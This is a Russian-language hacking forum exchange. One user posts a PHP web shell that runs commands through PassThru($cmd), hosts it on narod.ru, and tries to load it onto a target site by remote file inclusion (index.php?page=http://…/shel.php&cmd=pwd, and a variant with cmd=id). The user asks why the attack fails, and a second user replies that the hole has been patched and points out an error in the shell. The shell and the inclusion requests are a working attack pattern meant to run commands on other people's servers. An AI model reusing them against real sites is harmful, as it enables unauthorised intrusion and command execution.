Здрасьте, sorry, что пишу не по теме, но! У меня есть файл с шелом на .народ.ру вот содержимое этого сайта <?php echo "<pre>" ; PassThru($cmd) ; echo "</pre>"; echo "<?php echo "<pre>" ; PassThru($cmd) ; echo "</pre>"; echo "php shell by 310003102 haked by x32ph" ?> " ?> По идее если сайт бажный, то он мне должен выдать php shell by 310003102 haked by x32ph так вот, он мне выдает все это дело. Я пишу в адресной строке: www.XXX.xxx/index.php?page=http://www.XXX.narod.ru/ shel.php&cmd=pwd почему он не выдает мне мои правыа??? Что я не так делаю?
Вот на такой запрос /index.php?page=http://www.***.narod.ru/shel.php;&cmd=id он мне выдал Warning: main(): Failed opening 'http://www.x32ph.narod.ru/666.php;' for inclusion (include_path='.') in /home/htdocs/web12/html/kerken/index.php on line 38
тсареешь =)) в гугле уже дааавно это всё пофиксили, терь этим не воспользуешься... это раз... по поводу шела.. ты тооочно уверен, что возможно Sql-инъекция? + у тя ошибка в самом шеле... + он тебе НЕ выдаст то, что ты хочешь.. хакед бай Вася Пупкин... так как ты задаёшь ему параметр пвд.. он те теоретически должен выдать путь к тому, где находится данная страница, на которой ты выполняешь шелл-команды... вроде всё так... могу ошибатся ЗЫ: haCked пишется с буквой "с" =)
